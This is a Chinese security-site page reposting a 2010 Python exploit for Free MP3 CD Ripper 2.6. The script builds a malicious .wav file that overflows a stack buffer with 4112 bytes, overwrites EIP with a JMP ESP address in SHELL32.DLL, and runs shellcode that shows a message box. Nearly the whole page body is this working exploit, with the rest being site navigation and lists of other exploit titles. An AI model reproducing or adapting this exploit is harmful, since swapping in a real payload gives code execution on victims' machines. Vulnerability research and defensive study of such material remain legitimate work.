首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Free MP3 CD Ripper 2.6 (.wav/.ogg/.flac/.ape) Exploit
来源:vfocus.net 作者:Theng 发布时间:2010-08-09  
# Exploit Title: Free MP3 CD Ripper 2.6 (.wav , .ogg , .flac , .ape)
# Date: 7 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.exploit-db.com/application/12012/
# Version: 2.6
# Tested on: Windows XP SP 2
# CVE : N / A

#!/usr/bin/python

# User can replace the .wav extension below with any extensions specify above
filename = "crash.wav"

# 4112 bytes are needed before overwriting EIP register
junk = "\x41" * 4112

# JMP ESP at SHELL32.DLL
ret = "\x65\x82\xA5\x7C"  #  7C A5 82 65   FFE4   JMP ESP

# This piece of shellcode will pop up a messagebox 0.o !! wtf ...
shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
			"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
			"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
			"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
			"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
			"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
			"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
			"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
			"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
			"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
			"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
			"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
			"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
			"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
			"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
			"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
			"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
			"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
			"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
			"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
			"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
			"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
			"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
			"\x40\xFF\x54\x24\x40\x57\xFF\xD0")

# Building malicious data
exploit = junk + ret + "\x90" * 5 + shellcode   # left 265 for shellcode

textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·linux/x86 sethostname to "c0de
·cms star Database Disclosure E
·Visual MP3 Splitter & Joiner 6
·Esinti Defterv 6.1 Database Di
·AtomixMP3 2.3 .m3u File Buffer
·Destiny Media Player 1.61 (.m3
·ffdshow Video Codec Denial of
·myMP3-Player 3.0 (.m3u) File B
·myMP3-Player v3.0 Buffer Overf
·CoolPlayer219_Bin (.m3u) File
·Advanced File Vault(eSellerate
·iKlax Player 3.2 (.mp3) File B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved